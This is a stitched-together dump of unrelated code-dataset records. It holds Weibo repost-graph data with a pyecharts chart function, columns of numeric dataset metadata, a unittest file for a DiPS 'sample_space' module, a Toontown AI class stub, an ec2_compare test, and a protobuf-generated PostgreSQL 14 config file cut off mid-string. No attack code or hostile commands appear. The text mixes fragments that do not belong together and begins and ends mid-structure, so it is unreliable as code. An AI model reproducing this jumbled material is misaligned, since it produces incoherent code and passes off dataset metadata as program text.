"target": "没籽的葡萄好吃"
},
{
"source": "新浪体育",
"target": "偶尔有点帅1988"
},
{
"source": "新浪体育",
"target": "开老爷车的熊"
},
{
"source": "新浪体育",
"target": "北辰慢慢跑"
},
{
"source": "新浪体育",
"target": "Mitsuhide明智"
},
{
"source": "新浪体育",
"target": "不记得今天是礼拜几"
},
{
"source": "新浪体育",
"target": "耗社会主义股市羊毛"
},
{
"source": "新浪体育",
"target": "Christinez"
},
{
"source": "新浪体育",
"target": "Mr-LeeZL"
},
{
"source": "新浪体育",
"target": "给美希庆生的P_卡卡"
},
{
"source": "新浪体育",
"target": "重工组长于彦舒"
}
],
[
{
"name": ""
},
{
"name": "Camel3942"
},
{
"name": "Christinez"
},
{
"name": "JoannaBlue"
},
{
"name": "Michael-Cheung-"
},
{
"name": "NKmilitaryStudies"
},
{
"name": "Syfannn"
},
{
"name": "Tiger公子"
},
{
"name": "VeryE"
},
{
"name": "X_iao樓"
},
{
"name": "Xiao-斌杰"
},
{
"name": "_nearly转1"
},
{
"name": "lfx160219"
},
{
"name": "offfarmworkes2"
},
{
"name": "sazen"
},
{
"name": "stephen1999c"
},
{
"name": "w新晴w"
},
{
"name": "xHao晓灏"
},
{
"name": "上局沪段_沪"
},
{
"name": "中出宪政柏拉图"
},
{
"name": "中华龙会"
},
{
"name": "五十岚空芔"
},
{
"name": "京城吃货日记"
},
{
"name": "人形高达奈叶"
},
{
"name": "优质羊毛"
},
{
"name": "加菲杰克"
},
{
"name": "北京金戈戈"
},
{
"name": "南迦巴瓦的晨曦"
},
{
"name": "吉四六"
},
{
"name": "喷嚏网铂程"
},
{
"name": "嗨哥苏大少"
},
{
"name": "堕落熊猫001"
},
{
"name": "夏至蟲之音"
},
{
"name": "天天越野跑"
},
{
"name": "天水2院张医生"
},
{
"name": "天津王麟"
},
{
"name": "孟加拉虎的BLOG"
},
{
"name": "宋燕不v"
},
{
"name": "尧哥讲笑话"
},
{
"name": "开老爷车的熊"
},
{
"name": "张晨初艺术空间"
},
{
"name": "张欧亚"
},
{
"name": "我们认识"
},
{
"name": "战争史研究WHS"
},
{
"name": "战争史研究WHS:图片评论 http"
},
{
"name": "投行老人"
},
{
"name": "换个名字好累人"
},
{
"name": "新浪体育"
},
{
"name": "方便卫生起效慢"
},
{
"name": "无心耳语08"
},
{
"name": "暗能量泡泡"
},
{
"name": "歌手亚东"
},
{
"name": "没籽的葡萄好吃"
},
{
"name": "澳洲李市民"
},
{
"name": "灰狼多样性"
},
{
"name": "爱哟快乐"
},
{
"name": "猫饭P"
},
{
"name": "猿十三"
},
{
"name": "王唔悦"
},
{
"name": "相忘于2222"
},
{
"name": "简木生--包丰瀛"
},
{
"name": "紫霄时雨_苍穹要塞难民"
},
{
"name": "紹灝Lam"
},
{
"name": "罗昌平"
},
{
"name": "耳光赵荒唐"
},
{
"name": "肉食者Play"
},
{
"name": "胖猪猪呼呼睡"
},
{
"name": "花卷沉湎"
},
{
"name": "苗条的小实"
},
{
"name": "豆名扬"
},
{
"name": "过去的老照片"
},
{
"name": "远古的刀"
},
{
"name": "重工组长于彦舒"
},
{
"name": "長滒"
},
{
"name": "陇上优品-陶磊"
},
{
"name": "降夭除魔齐天大圣"
},
{
"name": "马周扬律师"
},
{
"name": "鬼面绣裁"
},
{
"name": "魔都310土匪"
},
{
"name": "麻黑浮云"
}
],
"#搏击VS太极# 近日武林不是很太平,争论也很多[思考]有网友翻出前全运会武术冠军、著名演员@李连杰 接受杨澜专访时说的话,李连杰认为武术套路就是花架子——“当然\n了”,不是杀人的功夫。因为现在不再需要真功夫了,所谓的真功夫就是杀人最快的方法。 http://t.cn/RXgIUxg . ",
"4102228300324979",
"新浪体育"
]
def create_charts():
page = Page()
style = Style(
width=1100, height=600
)
nodes = [{"name": "结点1", "symbolSize": 10},
{"name": "结点2", "symbolSize": 20},
{"name": "结点3", "symbolSize": 30},
{"name": "结点4", "symbolSize": 40},
{"name": "结点5", "symbolSize": 50},
{"name": "结点6", "symbolSize": 40},
{"name": "结点7", "symbolSize": 30},
{"name": "结点8", "symbolSize": 20}]
links = []
for i in nodes:
for j in nodes:
links.append({"source": i.get('name'), "target": j.get('name')})
chart = Graph("关系图-力引导布局", **style.init_style)
chart.add("", nodes, links, graph_repulsion=8000, line_color='#aaa')
page.add(chart)
chart = Graph("关系图-环形布局", **style.init_style)
chart.add("", nodes, links, is_label_show=True, graph_repulsion=8000,
graph_layout='circular', label_text_color=None)
page.add(chart)
nodes, links, categories, cont, mid, _ = WEIBO
chart = Graph("关系图-微博转发", **style.init_style)
chart.add("", nodes, links, categories, label_pos="right", graph_repulsion=50,
is_legend_show=False, line_curve=0.2, label_text_color=None)
page.add(chart)
return page
| 22.086862
| 154
| 0.292221
| 20,891
| 397,939
| 5.555981
| 0.051841
| 0.075386
| 0.120617
| 0.178556
| 0.831016
| 0.80423
| 0.803196
| 0.730008
| 0.724787
| 0.410451
| 0
| 0.016686
| 0.541427
| 397,939
| 18,016
| 155
| 22.088088
| 0.619358
| 0
| 0
| 0.465182
| 0
| 0.000056
| 0.28725
| 0.000515
| 0
| 0
| 0
| 0
| 0
| 1
| 0.000056
| false
| 0
| 0.000056
| 0
| 0.000167
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
39ead68beea1cb32863af63b04fed5049d63177d
| 12,455
|
py
|
Python
|
test/test_sample_space.py
|
xhajnal/DiPS
|
2e5d6e0a26d2b1cd44522dc521992e6d7cfe6883
|
[
"BSD-3-Clause"
] | 4
|
2020-04-25T22:29:43.000Z
|
2022-01-14T07:52:55.000Z
|
test/test_sample_space.py
|
xhajnal/DiPS
|
2e5d6e0a26d2b1cd44522dc521992e6d7cfe6883
|
[
"BSD-3-Clause"
] | 64
|
2020-01-06T18:38:56.000Z
|
2022-02-27T18:38:45.000Z
|
test/test_sample_space.py
|
xhajnal/DiPS
|
2e5d6e0a26d2b1cd44522dc521992e6d7cfe6883
|
[
"BSD-3-Clause"
] | 3
|
2020-02-13T16:46:54.000Z
|
2021-11-26T11:47:56.000Z
|
import os
import unittest
from sympy import Interval
from termcolor import colored
import src.sample_space as sample_space
from common.convert import normalise_constraint, split_constraints
from space import RefinedSpace
from src.refine_space import *
curr_dir = os.path.dirname(__file__)
class MyTestCase(unittest.TestCase):
def test_check_sample(self):
print(colored("Testing check sample", 'blue'))
## Single constraint
sample_space.glob_sort = False
sample_space.glob_space = RefinedSpace(((0, 1), (0, 1)), ["p", "q"])
sample_space.glob_debug = False
sample_space.glob_compress = True
sample_space.glob_constraints = ["0.3 < p+q < 0.8"]
self.assertEqual(sample_space.check_sample([0, 0]), False)
self.assertEqual(sample_space.check_sample([0, 0.5]), True)
self.assertEqual(sample_space.check_sample([0.5, 0]), True)
self.assertEqual(sample_space.check_sample([0.5, 0.5]), False)
self.assertEqual(sample_space.check_sample([0.3, 0.3]), True)
sample_space.glob_compress = False
self.assertEqual(sample_space.check_sample([0, 0]), [False])
self.assertEqual(sample_space.check_sample([0, 0.5]), [True])
self.assertEqual(sample_space.check_sample([0.5, 0]), [True])
self.assertEqual(sample_space.check_sample([0.5, 0.5]), [False])
self.assertEqual(sample_space.check_sample([0.3, 0.3]), [True])
## Two constraints
sample_space.glob_constraints = ["0.3 < p+q < 0.8", "p>q"]
sample_space.glob_compress = True
self.assertEqual(sample_space.check_sample([0, 0]), False)
self.assertEqual(sample_space.check_sample([0, 0.5]), False)
self.assertEqual(sample_space.check_sample([0.5, 0]), True)
self.assertEqual(sample_space.check_sample([0.5, 0.5]), False)
self.assertEqual(sample_space.check_sample([0.3, 0.3]), False)
sample_space.glob_compress = False
self.assertEqual(sample_space.check_sample([0, 0]), [False, False])
self.assertEqual(sample_space.check_sample([0, 0.5]), [True, False])
self.assertEqual(sample_space.check_sample([0.5, 0]), [True, True])
self.assertEqual(sample_space.check_sample([0.5, 0.5]), [False, False])
self.assertEqual(sample_space.check_sample([0.3, 0.3]), [True, False])
## Error - Division by zero
sample_space.glob_constraints = ["0.3 < p/q < 0.8", "p>q"]
sample_space.glob_compress = True
self.assertEqual(sample_space.check_sample([0, 0]), None)
sample_space.glob_compress = False
self.assertEqual(sample_space.check_sample([0, 0]), [None, False])
## Single sided constraint
sample_space.glob_space = RefinedSpace([(0, 1), (0, 1)], ["p", "q"])
sample_space.glob_constraints = ["p < q"]
sample_space.glob_compress = True
self.assertEqual(sample_space.check_sample([0, 0]), False)
self.assertEqual(sample_space.check_sample([0, 0.5]), True)
self.assertEqual(sample_space.check_sample([0.5, 0]), False)
self.assertEqual(sample_space.check_sample([0.5, 0.5]), False)
self.assertEqual(sample_space.check_sample([0.3, 0.3]), False)
sample_space.glob_compress = False
self.assertEqual(sample_space.check_sample([0, 0]), [False])
self.assertEqual(sample_space.check_sample([0, 0.5]), [True])
self.assertEqual(sample_space.check_sample([0.5, 0]), [False])
self.assertEqual(sample_space.check_sample([0.5, 0.5]), [False])
self.assertEqual(sample_space.check_sample([0.3, 0.3]), [False])
sample_space.glob_constraints = ["p > q"]
sample_space.glob_compress = True
self.assertEqual(sample_space.check_sample([0, 0]), False)
self.assertEqual(sample_space.check_sample([0, 0.5]), False)
self.assertEqual(sample_space.check_sample([0.5, 0]), True)
self.assertEqual(sample_space.check_sample([0.5, 0.5]), False)
self.assertEqual(sample_space.check_sample([0.3, 0.3]), False)
sample_space.glob_compress = False
self.assertEqual(sample_space.check_sample([0, 0]), [False])
self.assertEqual(sample_space.check_sample([0, 0.5]), [False])
self.assertEqual(sample_space.check_sample([0.5, 0]), [True])
self.assertEqual(sample_space.check_sample([0.5, 0.5]), [False])
self.assertEqual(sample_space.check_sample([0.3, 0.3]), [False])
def test_sample_sat_degree(self):
print(colored("Testing satisfaction degree of a sample", 'blue'))
sample_space.glob_sort = False
sample_space.glob_space = RefinedSpace((0, 1), ["p"])
sample_space.glob_debug = False
sample_space.glob_compress = True
constraints = ["0.3 < p < 0.8"]
constraints = list(map(normalise_constraint, constraints))
constraints = split_constraints(constraints)
sample_space.glob_constraints = constraints
self.assertEqual(sample_space.sample_sat_degree([0]), - 0.3)
self.assertEqual(sample_space.sample_sat_degree([0.5]), 0.2)
self.assertEqual(sample_space.sample_sat_degree([0.3]), 0)
self.assertEqual(round(sample_space.sample_sat_degree([0.9]), 2), -0.1)
constraints = ["0.3 <= p = 0.8"]
constraints = list(map(normalise_constraint, constraints))
constraints = split_constraints(constraints)
sample_space.glob_constraints = constraints
self.assertEqual(sample_space.sample_sat_degree([0]), - 0.3)
self.assertEqual(sample_space.sample_sat_degree([0.5]), 0.2)
self.assertEqual(sample_space.sample_sat_degree([0.3]), 0)
self.assertEqual(round(sample_space.sample_sat_degree([0.9]), 2), -0.1)
sample_space.glob_compress = False
self.assertEqual(sample_space.sample_sat_degree([0]), [- 0.3])
self.assertEqual(sample_space.sample_sat_degree([0.5]), [0.2])
self.assertEqual(sample_space.sample_sat_degree([0.3]), [0])
self.assertEqual(list(map(lambda x: round(x, 2), sample_space.sample_sat_degree([0.9]))), [-0.1])
sample_space.glob_space = RefinedSpace(((0, 1), (0, 1)), ["p", "q"])
constraints = ["0.3 < p+q < 0.8", "p > q"]
constraints = list(map(normalise_constraint, constraints))
print(constraints)
constraints = split_constraints(constraints)
print(constraints)
sample_space.glob_constraints = constraints
sample_space.sample_sat_degree([0, 0])
sample_space.glob_compress = True
self.assertEqual(round(sample_space.sample_sat_degree([0, 0]), 2), -0.3+0)
self.assertEqual(round(sample_space.sample_sat_degree([0, 0.5]), 2), 0.2-0.5)
self.assertEqual(round(sample_space.sample_sat_degree([0.5, 0]), 2), 0.2+0.5)
self.assertEqual(round(sample_space.sample_sat_degree([0.5, 0.5]), 2), -0.2+0)
self.assertEqual(round(sample_space.sample_sat_degree([0.3, 0.3]), 2), 0.2+0)
sample_space.glob_compress = False
self.assertEqual(list(map(lambda x: round(x, 2), sample_space.sample_sat_degree([0, 0]))), [-0.3, 0])
self.assertEqual(list(map(lambda x: round(x, 2), sample_space.sample_sat_degree([0, 0.5]))), [0.2, -0.5])
self.assertEqual(list(map(lambda x: round(x, 2), sample_space.sample_sat_degree([0.5, 0]))), [0.2, 0.5])
self.assertEqual(list(map(lambda x: round(x, 2), sample_space.sample_sat_degree([0.5, 0.5]))), [-0.2, 0])
self.assertEqual(list(map(lambda x: round(x, 2), sample_space.sample_sat_degree([0.3, 0.3]))), [0.2, 0])
sample_space.glob_space = RefinedSpace([(0, 1), (0, 1)], ["p", "q"])
constraints = ["p < q"]
constraints = list(map(normalise_constraint, constraints))
constraints = split_constraints(constraints)
sample_space.glob_constraints = constraints
sample_space.glob_compress = True
self.assertEqual(sample_space.sample_sat_degree([0, 0]), 0)
self.assertEqual(sample_space.sample_sat_degree([4, 5]), 1)
self.assertEqual(sample_space.sample_sat_degree([5, 4]), -1)
sample_space.glob_compress = False
self.assertEqual(sample_space.sample_sat_degree([0, 0]), [0])
self.assertEqual(sample_space.sample_sat_degree([4, 5]), [1])
self.assertEqual(sample_space.sample_sat_degree([5, 4]), [-1])
constraints = ["p > q"]
constraints = list(map(normalise_constraint, constraints))
constraints = split_constraints(constraints)
sample_space.glob_constraints = constraints
sample_space.glob_compress = True
self.assertEqual(sample_space.sample_sat_degree([0, 0]), 0)
self.assertEqual(sample_space.sample_sat_degree([4, 5]), -1)
self.assertEqual(sample_space.sample_sat_degree([5, 4]), 1)
sample_space.glob_compress = False
self.assertEqual(sample_space.sample_sat_degree([0, 0]), [0])
self.assertEqual(sample_space.sample_sat_degree([4, 5]), [-1])
self.assertEqual(sample_space.sample_sat_degree([5, 4]), [1])
def test_space_sample(self):
print(colored("Sampling space test here", 'blue'))
## Initialisation
space = RefinedSpace((0, 1), ["x"], ["Real"], [Interval(0, 1)])
# print(space.nice_print())
debug = False
constraints1 = ["x<3"]
constraints2 = ["x>3"]
constraints3 = ["x>3", "x<3"]
constraints4 = ["x<=1", "x>=0"]
constraints5 = ["x>3", "x>=0"]
## def sample(space, constraints, size_q, compress)
## Example: sample(space, constraints1, 1, debug=debug)
# a = sample(space, constraints1, 1, debug=debug)
self.assertEqual(sample(space, constraints1, 1, debug=debug)[0][0], True)
self.assertEqual(len(space.get_sat_samples()), 1)
self.assertEqual(len(space.get_unsat_samples()), 0)
self.assertEqual(sample(space, constraints2, 1, debug=debug)[0][0], False)
self.assertEqual(len(space.get_sat_samples()), 1)
self.assertEqual(len(space.get_unsat_samples()), 1)
self.assertEqual(sample(space, constraints3, 1, compress=True, debug=debug)[0], False)
self.assertEqual(len(space.get_sat_samples()), 1)
self.assertEqual(len(space.get_unsat_samples()), 2)
self.assertEqual(sample(space, constraints4, 1, compress=True, debug=debug)[0], True)
self.assertEqual(len(space.get_sat_samples()), 2)
self.assertEqual(len(space.get_unsat_samples()), 2)
self.assertEqual(sample(space, constraints5, 1, compress=True, debug=debug)[0], False)
self.assertEqual(len(space.get_sat_samples()), 2)
self.assertEqual(len(space.get_unsat_samples()), 3)
space = RefinedSpace([(0, 1), (0, 1)], ["x", "y"])
constraints3 = ["x+y>3", "x+y<3"]
constraints4 = ["x+y<=1", "x+y>=0"]
constraints5 = ["x+y>3", "x+y>=0"]
self.assertEqual(sample(space, constraints3, 1, compress=True, debug=debug)[0], False)
self.assertEqual(len(space.get_sat_samples()), 0)
self.assertEqual(len(space.get_unsat_samples()), 1)
self.assertEqual(sample(space, constraints4, 1, compress=True, debug=debug)[0], True)
self.assertEqual(len(space.get_sat_samples()), 1)
self.assertEqual(len(space.get_unsat_samples()), 1)
self.assertEqual(sample(space, constraints5, 1, compress=True, debug=debug)[0], False)
self.assertEqual(len(space.get_sat_samples()), 1)
self.assertEqual(len(space.get_unsat_samples()), 2)
space = RefinedSpace([(0, 1), (0, 1)], ["x", "y"])
constraints3 = ["x+y>3", "x+y<3"]
constraints4 = ["x+y<=1", "x+y>=0"]
constraints5 = ["x+y>3", "x+y>=0"]
self.assertEqual(sample(space, constraints3, 1, debug=debug)[0], [False, True])
self.assertEqual(len(space.get_sat_samples()), 0)
self.assertEqual(len(space.get_unsat_samples()), 1)
self.assertEqual(sample(space, constraints4, 1, debug=debug)[0], [True, True])
self.assertEqual(len(space.get_sat_samples()), 1)
self.assertEqual(len(space.get_unsat_samples()), 1)
self.assertEqual(sample(space, constraints5, 1, debug=debug)[0], [False, True])
self.assertEqual(len(space.get_sat_samples()), 1)
self.assertEqual(len(space.get_unsat_samples()), 2)
if __name__ == "__main__":
unittest.main()
| 49.82
| 113
| 0.653713
| 1,710
| 12,455
| 4.560234
| 0.052632
| 0.18338
| 0.199282
| 0.24673
| 0.89741
| 0.883432
| 0.869197
| 0.859836
| 0.845858
| 0.84278
| 0
| 0.043246
| 0.188679
| 12,455
| 249
| 114
| 50.02008
| 0.728451
| 0.021999
| 0
| 0.604061
| 0
| 0
| 0.027296
| 0
| 0
| 0
| 0
| 0
| 0.553299
| 1
| 0.015228
| false
| 0
| 0.040609
| 0
| 0.060914
| 0.025381
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
39f004dd2fc6be21cd91daf496db4adeddb84b0f
| 114
|
py
|
Python
|
toontown/building/DistributedToonHallInteriorAI.py
|
CrankySupertoon01/Toontown-2
|
60893d104528a8e7eb4aced5d0015f22e203466d
|
[
"MIT"
] | 1
|
2021-02-13T22:40:50.000Z
|
2021-02-13T22:40:50.000Z
|
toontown/building/DistributedToonHallInteriorAI.py
|
CrankySupertoonArchive/Toontown-2
|
60893d104528a8e7eb4aced5d0015f22e203466d
|
[
"MIT"
] | 1
|
2018-07-28T20:07:04.000Z
|
2018-07-30T18:28:34.000Z
|
toontown/building/DistributedToonHallInteriorAI.py
|
CrankySupertoonArchive/Toontown-2
|
60893d104528a8e7eb4aced5d0015f22e203466d
|
[
"MIT"
] | 2
|
2019-12-02T01:39:10.000Z
|
2021-02-13T22:41:00.000Z
|
from DistributedToonInteriorAI import *
class DistributedToonHallInteriorAI(DistributedToonInteriorAI):
pass
| 22.8
| 63
| 0.859649
| 7
| 114
| 14
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.105263
| 114
| 4
| 64
| 28.5
| 0.960784
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
8453c68cd09b39aa9720015d5c2c6b29e7579a7e
| 349
|
py
|
Python
|
tests/internal/instance_type/test_instance_type_d2_auto.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | null | null | null |
tests/internal/instance_type/test_instance_type_d2_auto.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | null | null | null |
tests/internal/instance_type/test_instance_type_d2_auto.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | 1
|
2021-12-15T11:58:22.000Z
|
2021-12-15T11:58:22.000Z
|
# Testing module instance_type.d2
import pytest
import ec2_compare.internal.instance_type.d2
def test_get_internal_data_instance_type_d2_get_instances_list():
assert len(ec2_compare.internal.instance_type.d2.get_instances_list()) > 0
def test_get_internal_data_instance_type_d2_get():
assert len(ec2_compare.internal.instance_type.d2.get) > 0
| 34.9
| 76
| 0.848138
| 56
| 349
| 4.839286
| 0.339286
| 0.265683
| 0.309963
| 0.250923
| 0.826568
| 0.826568
| 0.612546
| 0.612546
| 0.612546
| 0
| 0
| 0.034056
| 0.074499
| 349
| 9
| 77
| 38.777778
| 0.804954
| 0.088825
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 10
|
8464f108e90695ba67eb9460fdc9a7367f4f49ea
| 134,945
|
py
|
Python
|
yandex/cloud/mdb/postgresql/v1/config/postgresql14_pb2.py
|
ovandriyanov/python-sdk
|
eec7dc65ef23789388fa46d13087d4a03cdc6e57
|
[
"MIT"
] | null | null | null |
yandex/cloud/mdb/postgresql/v1/config/postgresql14_pb2.py
|
ovandriyanov/python-sdk
|
eec7dc65ef23789388fa46d13087d4a03cdc6e57
|
[
"MIT"
] | null | null | null |
yandex/cloud/mdb/postgresql/v1/config/postgresql14_pb2.py
|
ovandriyanov/python-sdk
|
eec7dc65ef23789388fa46d13087d4a03cdc6e57
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: yandex/cloud/mdb/postgresql/v1/config/postgresql14.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.protobuf import wrappers_pb2 as google_dot_protobuf_dot_wrappers__pb2
from yandex.cloud import validation_pb2 as yandex_dot_cloud_dot_validation__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='yandex/cloud/mdb/postgresql/v1/config/postgresql14.proto',
package='yandex.cloud.mdb.postgresql.v1.config',
syntax='proto3',
serialized_options=b'\n)yandex.cloud.api.mdb.postgresql.v1.configZTgithub.com/yandex-cloud/go-genproto/yandex/cloud/mdb/postgresql/v1/config;postgresql',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n8yandex/cloud/mdb/postgresql/v1/config/postgresql14.proto\x12%yandex.cloud.mdb.postgresql.v1.config\x1a\x1egoogle/protobuf/wrappers.proto\x1a\x1dyandex/cloud/validation.proto\"\x9d`\n\x12PostgresqlConfig14\x12\x34\n\x0fmax_connections\x18\x01 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x33\n\x0eshared_buffers\x18\x02 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x31\n\x0ctemp_buffers\x18\x03 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12>\n\x19max_prepared_transactions\x18\x04 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12-\n\x08work_mem\x18\x05 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x39\n\x14maintenance_work_mem\x18\x06 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x38\n\x13\x61utovacuum_work_mem\x18\x07 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x34\n\x0ftemp_file_limit\x18\x08 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x36\n\x11vacuum_cost_delay\x18\t \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x39\n\x14vacuum_cost_page_hit\x18\n \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12:\n\x15vacuum_cost_page_miss\x18\x0b \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12;\n\x16vacuum_cost_page_dirty\x18\x0c \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x36\n\x11vacuum_cost_limit\x18\r \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x41\n\x0e\x62gwriter_delay\x18\x0e \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x0c\xfa\xc7\x31\x08\x31\x30-10000\x12:\n\x15\x62gwriter_lru_maxpages\x18\x0f \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12=\n\x17\x62gwriter_lru_multiplier\x18\x10 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12\x45\n\x14\x62gwriter_flush_after\x18\x11 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\n\xfa\xc7\x31\x06\x30-2048\x12\x44\n\x13\x62\x61\x63kend_flush_after\x18\x12 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\n\xfa\xc7\x31\x06\x30-2048\x12L\n\x16old_snapshot_threshold\x18\x13 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x0f\xfa\xc7\x31\x0b-1-86400000\x12U\n\twal_level\x18\x14 \x01(\x0e\x32\x42.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.WalLevel\x12g\n\x12synchronous_commit\x18\x15 \x01(\x0e\x32K.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.SynchronousCommit\x12K\n\x12\x63heckpoint_timeout\x18\x16 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x12\xfa\xc7\x31\x0e\x33\x30\x30\x30\x30-86400000\x12\x42\n\x1c\x63heckpoint_completion_target\x18\x17 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12G\n\x16\x63heckpoint_flush_after\x18\x18 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\n\xfa\xc7\x31\x06\x30-2048\x12\x31\n\x0cmax_wal_size\x18\x19 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x31\n\x0cmin_wal_size\x18\x1a \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12@\n\x1bmax_standby_streaming_delay\x18\x1b \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12>\n\x19\x64\x65\x66\x61ult_statistics_target\x18\x1c \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12k\n\x14\x63onstraint_exclusion\x18\x1d \x01(\x0e\x32M.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.ConstraintExclusion\x12;\n\x15\x63ursor_tuple_fraction\x18\x1e \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12J\n\x13\x66rom_collapse_limit\x18\x1f \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x10\xfa\xc7\x31\x0c\x31-2147483647\x12J\n\x13join_collapse_limit\x18 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x10\xfa\xc7\x31\x0c\x31-2147483647\x12h\n\x13\x66orce_parallel_mode\x18! \x01(\x0e\x32K.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.ForceParallelMode\x12_\n\x13\x63lient_min_messages\x18\" \x01(\x0e\x32\x42.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.LogLevel\x12\\\n\x10log_min_messages\x18# \x01(\x0e\x32\x42.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.LogLevel\x12\x63\n\x17log_min_error_statement\x18$ \x01(\x0e\x32\x42.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.LogLevel\x12?\n\x1alog_min_duration_statement\x18% \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x33\n\x0flog_checkpoints\x18& \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x33\n\x0flog_connections\x18\' \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x36\n\x12log_disconnections\x18( \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x30\n\x0clog_duration\x18) \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12h\n\x13log_error_verbosity\x18* \x01(\x0e\x32K.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.LogErrorVerbosity\x12\x32\n\x0elog_lock_waits\x18+ \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12]\n\rlog_statement\x18, \x01(\x0e\x32\x46.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.LogStatement\x12\x33\n\x0elog_temp_files\x18- \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x13\n\x0bsearch_path\x18. \x01(\t\x12\x30\n\x0crow_security\x18/ \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12u\n\x1d\x64\x65\x66\x61ult_transaction_isolation\x18\x30 \x01(\x0e\x32N.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.TransactionIsolation\x12\x36\n\x11statement_timeout\x18\x31 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x31\n\x0clock_timeout\x18\x32 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12H\n#idle_in_transaction_session_timeout\x18\x33 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12[\n\x0c\x62ytea_output\x18\x34 \x01(\x0e\x32\x45.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.ByteaOutput\x12V\n\txmlbinary\x18\x35 \x01(\x0e\x32\x43.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.XmlBinary\x12V\n\txmloption\x18\x36 